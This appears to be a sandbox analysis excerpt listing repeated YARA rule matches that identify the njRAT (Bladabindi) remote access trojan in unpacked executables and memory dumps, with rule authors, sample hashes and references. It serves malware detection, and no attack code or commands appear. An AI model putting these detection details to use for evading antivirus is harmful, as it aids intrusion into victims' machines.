        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
